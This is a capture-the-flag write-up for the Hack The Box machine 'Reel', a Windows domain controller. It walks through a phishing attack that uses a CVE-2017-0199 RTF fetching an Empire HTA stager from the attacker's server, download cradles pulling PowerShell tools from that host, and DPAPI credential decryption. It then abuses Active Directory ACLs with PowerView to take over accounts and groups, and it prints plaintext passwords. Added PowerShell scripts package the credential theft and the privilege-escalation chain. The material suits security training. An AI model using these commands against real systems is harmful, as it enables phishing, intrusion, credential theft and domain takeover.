Reel
Target machine:
https://www.hackthebox.eu/home/machines/profile/143
nmap -v -A -sV -sC 10.10.10.77
This is a Windows Server 2012 R2 host running SSH, FTP and SMTP, and it is an Active Directory domain controller (HTB.LOCAL).
The scan shows that the FTP server allows anonymous login.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
Host script results:
|_clock-skew: mean: -47s, deviation: 2s, median: -49s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2019-01-21T03:35:22+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-01-21 11:35:20
|_ start_date: 2019-01-21 07:54:45
Log in to FTP anonymously and use mget * to pull down the contents: three files, AppLocker.docx, readme.txt and Windows Event Forwarding.docx.
$ ftp
ftp> open
(to) 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:Rogerd): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
ftp> cd documents
250 CWD command successful.
ftp> mget *
mget AppLocker.docx?
200 PORT command successful.
cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
Someone is asking for RTF procedures by email and will open whatever arrives, so the plan is to craft a malicious RTF and mail it. First we need an address to send it to.
The other two files are Word documents; one of them does not open directly, so we look at its metadata with exiftool instead.
The Creator field gives us an email address:
exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 11.16
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 kB
File Modification Date/Time : 2019:01:21 12:01:36+08:00
File Access Date/Time : 2019:01:21 13:00:24+08:00
File Inode Change Date/Time : 2019:01:21 12:01:36+08:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Open AppLocker.docx. It says hash rules are enforced for executables, MSI packages and scripts:
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
So dropping our own exe or script on disk and running it will be blocked. Note that .hta is not in that list, which matters for the payload chosen below.
We will try mailing nico@megabank.com and listen on a port to see whether anything calls back.
For the payload we use the CVE-2017-0199 exploit toolkit (Microsoft Office RCE), which generates malicious RTF / PPSX files:
https://github.com/bhdresh/CVE-2017-0199
Start a Python web server to catch the callback:
python -m SimpleHTTPServer 8000
Generate the RTF with the toolkit; the RTF embeds the URL of the HTA that the victim's Office will fetch:
python cve-2017-0199_toolkit.py -M gen -t RTF -w TEST.RTF -u http://10.10.14.19:8000/reel.hta
Send it with sendEmail, using the target's own SMTP server as the relay:
sendEmail -f rogerd@megabank.com -t nico@megabank.com -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77
A request hits port 8000, so the document was opened and the URL was fetched.
Empire is a post-exploitation framework that manages PowerShell agents.
We use Empire to generate the HTA, put the HTA in the directory served by the Python web server (the tmp directory), and mail the RTF again; when the recipient opens TEST.RTF, Office fetches reel.hta from our server and runs it.
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.14.19
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > usestager windows/hta
(Empire: stager/windows/hta) > set Listener http
(Empire: stager/windows/hta) > set OutFile /home/Rogerd/tools/CVE-2017-0199/reel.hta
(Empire: stager/windows/hta) > generate
[*] Stager output written out to: /home/Rogerd/tools/CVE-2017-0199/reel.hta
Move reel.hta into the web root (the tmp directory), start python -m SimpleHTTPServer 8000 there, and send the mail again:
sendEmail -f rogerd@megabank.com -t nico@megabank.com -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77
An agent checks in, so we have a shell as nico.
Looking at the Desktop, there are several files; user.txt is the first flag.
(Empire: stager/windows/hta) > agents
[*] Active agents:
Name     Lang  Internal IP  Machine Name  Username  Process     PID   Delay  Last Seen
----     ----  -----------  ------------  --------  -------     ---   -----  ---------
G25L3MWT ps    10.10.10.77  REEL          HTB\nico  powershell  2468  5/0.0  2019-01-23 11:49:22
(Empire: agents) > interact G25L3MWT
Also on the Desktop is cred.xml, a PSCredential object serialized with Export-Clixml (the usual way to store a password for PowerShell remoting). The UserName is in the clear; the password is a SecureString protected with DPAPI under the key of the user who exported it.
(Empire: G25L3MWT) > shell Get-Content cred.xml
[*] Tasked G25L3MWT to run TASK_SHELL
[*] Agent G25L3MWT tasked with task ID 19
(Empire: G25L3MWT) > [*] Agent G25L3MWT returned results.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
..Command execution completed.
Because our agent runs as nico, the account that exported the file, the SecureString can be decrypted on this host with Import-Clixml, which gives us Tom's password.
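Recovering the plaintext from cred.xml, as an added example that is not part of the original writeup. It assumes the file is the Export-Clixml output shown above at the path given below, and that it runs in a session as HTB\nico (for example through the Empire agent's shell command), because the DPAPI key needed for the SecureString belongs to that account on this machine.

```powershell
# Added example, not from the original writeup. Path is assumed.
function Get-ClixmlPlaintext {
    param([Parameter(Mandatory)][string]$Path)

    # Import-Clixml rebuilds the PSCredential. The <SS> element is a SecureString
    # encrypted with DPAPI under the *current* user's master key, so this only
    # succeeds when run as the account that exported the file (here HTB\nico).
    # From any other account the import fails with "Key not valid for use in
    # specified state"; we surface that instead of returning an empty object.
    try {
        $cred = Import-Clixml -Path $Path -ErrorAction Stop
    } catch {
        throw "Could not decrypt $Path as $env:USERDOMAIN\$env:USERNAME; run it as the exporting user. ($($_.Exception.Message))"
    }

    # GetNetworkCredential() is the documented way to read the SecureString back.
    [pscustomobject]@{
        UserName = $cred.UserName
        Password = $cred.GetNetworkCredential().Password
    }
}

Get-ClixmlPlaintext -Path 'C:\Users\nico\Desktop\cred.xml'
```

From the Empire agent the same thing is a one-liner: shell powershell -c "(Import-Clixml cred.xml).GetNetworkCredential().Password". The caveat is the important part: copying cred.xml off the box and importing it on Kali or as another user yields nothing, since the blob is bound to nico's DPAPI master key.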
We can also run PowerUp's allchecks module to enumerate the host. Among other things it finds nico's own password stored in the Winlogon automatic-logon registry values (DefaultUserName / DefaultPassword), which also works for SSH:
(Empire: 7H9GMEV2) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked 7H9GMEV2 to run TASK_CMD_JOB
[*] Agent 7H9GMEV2 tasked with task ID 26
[*] Tasked agent 7H9GMEV2 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > [*] Agent 7H9GMEV2 returned results.
Job started: 64FXBN
[*] Valid results returned by 10.10.10.77
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
ServiceName : ssh-agent
Path : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart : False
ServiceName : ssh-agent
Path : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart : False
ServiceName : sshd
Path : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : NT SERVICE\SSHD
AbuseFunction : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart : False
ServiceName : sshd
Path : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : NT SERVICE\SSHD
AbuseFunction : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart : False
DefaultDomainName : HTB
DefaultUserName : nico
DefaultPassword : 4dri@na2017!**
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
With the password recovered from cred.xml we SSH in as tom:
ssh tom@10.10.10.77
1ts-mag1c!!!
In tom -> Desktop -> AD Audit there is a note.txt.
It says the audit found no attack path to Domain Admin with the default shortest-path query and suggests re-running the Cypher query against other groups, which is a strong hint that a path to some other group exists:
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
Next to it, in tom -> Desktop -> AD Audit -> BloodHound, is a BloodHound directory. For background:
BloodHound uses graph theory to reveal hidden and often unintended relationships in an Active Directory environment. Attackers can use it to identify highly complex attack paths that would otherwise be hard to find quickly; defenders can use it to identify and eliminate those same paths. Both red and blue teams can use BloodHound to gain a deeper understanding of privilege relationships in AD.
Installing BloodHound:
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
Logged in as tom, we replace the SharpHound.ps1 in the Ingestors directory with a fresh copy (first copy SharpHound.ps1 from the Ingestors folder of the downloaded BloodHound release into the directory served on port 8000):
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.19:8000/SharpHound.ps1','SharpHound.ps1')"
Then run SharpHound to collect the domain data:
powershell -exec bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Pull the resulting zip back with scp and drag it into the BloodHound UI:
scp -P 22 tom@10.10.10.77:"\"/C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/20190124161418_BloodHound.zip\"" /tmp/
The database shows 18 users and 61 groups.
We can look at individual groups; Backup_Admins is the interesting one.
Search for tom@HTB.LOCAL,
set it as the starting node,
and set backup_admins as the ending node.
The path is: TOM has WriteOwner over CLAIRE, and CLAIRE has write access (WriteDacl) to BACKUP_ADMINS.
Right-click the WriteOwner edge and open Help -> Info for the explanation:
Tom can change the owner of the Claire object, and Claire can change the DACL of the Backup_Admins group.
The user TOM@HTB.LOCAL has the ability to modify the owner of the user CLAIRE@HTB.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
So we take over claire first, then use her to get into Backup_Admins.
The way to do this is to change ownership with PowerView;
the PowerView documentation (see the references) covers the relevant functions:
Set-DomainObjectOwner sets the owner of an object.
Add-DomainObjectAcl adds an ACE to an object's DACL.
Set-DomainUserPassword resets a user's password (no old password needed when we hold the ResetPassword right).
Steps, all run as Tom:
1. Make Tom the owner of the Claire object (WriteOwner allows this).
2. As the owner, add an ACE granting Tom the right to reset Claire's password.
3. Reset the password.
powershell -command "import-module .\PowerView.ps1; Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose; $pass=ConvertTo-SecureString 'AbC!@#123' -AsPlainText -Force; Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose"
Following the attack path, the next step is to put Claire into the Backup_Admins group.
PowerView.ps1 is not on the box, so download it from Kali first:
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.19:8000/PowerView.ps1','PowerView.ps1')"
Then, as claire (log in with the new password), use her WriteDacl on the group to grant herself the right to write its members, and add herself:
powershell -command "import-module .\PowerView.ps1; Add-DomainObjectAcl -TargetIdentity 'Backup_Admins' -PrincipalIdentity claire -Rights WriteMembers -Verbose; Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Verbose"
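The whole Tom -> Claire -> Backup_Admins chain as a single PowerView script with a check after each step, as an added example that is not the original writeup's command sequence. It assumes PowerView.ps1 is in the current directory, that it runs in tom's SSH session, and reuses the password and object names used above; the claire half is done from tom's session through PowerView's -Credential parameter rather than by logging in again.

```powershell
# Added example, not from the original writeup. Run from tom's session with
# PowerView.ps1 in the current directory.
Import-Module .\PowerView.ps1

$newPass = ConvertTo-SecureString 'AbC!@#123' -AsPlainText -Force

# Step 0: confirm the WriteOwner edge BloodHound reported before changing anything.
$tomSid = ConvertTo-SID 'HTB\tom'
Get-DomainObjectAcl -Identity claire -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier -eq $tomSid -and
                   $_.ActiveDirectoryRights -match 'WriteOwner|GenericAll' }

# Step 1: take ownership of the claire object. Owners may edit the DACL
# regardless of what the DACL currently says.
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose

# Step 2: as owner, grant tom the extended right to reset claire's password.
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose

# Step 3: reset it. ResetPassword does not require the old password.
Set-DomainUserPassword -Identity claire -AccountPassword $newPass -Verbose

# Step 4: act as claire without a new logon. She holds WriteDacl on Backup_Admins,
# which does not by itself allow writing the member attribute, so first add an
# ACE granting her WriteMembers, then add her to the group.
$claireCred = New-Object System.Management.Automation.PSCredential('HTB\claire', $newPass)
Add-DomainObjectAcl -TargetIdentity 'Backup_Admins' -PrincipalIdentity claire -Rights WriteMembers -Credential $claireCred -Verbose
Add-DomainGroupMember -Identity 'Backup_Admins' -Members claire -Credential $claireCred -Verbose

# Step 5: verify. Group membership is stamped into the access token at logon, so
# claire needs a fresh SSH session before Backup_Admins actually applies to her.
Get-DomainGroupMember -Identity 'Backup_Admins' | Select-Object MemberName
```

Step 4 is where a copy-and-paste of the original command goes wrong: granting claire rights on her own user object does nothing for the group; the ACE has to be placed on Backup_Admins, which is exactly what her WriteDacl edge permits.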
After logging in again as claire (so the new group membership is in her token), we can read the Administrator -> Backup_Script folder.
root.txt itself is still not readable.
The Backup_Script directory contains several scripts; Backup_Script.ps1 is a backup script that contains the key information for the last step.
References:
https://www.anquanke.com/post/id/85695
https://www.knowsec.net/archives/238/
https://www.harmj0y.net/blog/powershell/make-powerview-great-again/
https://github.com/ama21n/powershell/blob/master/PowerView.ps1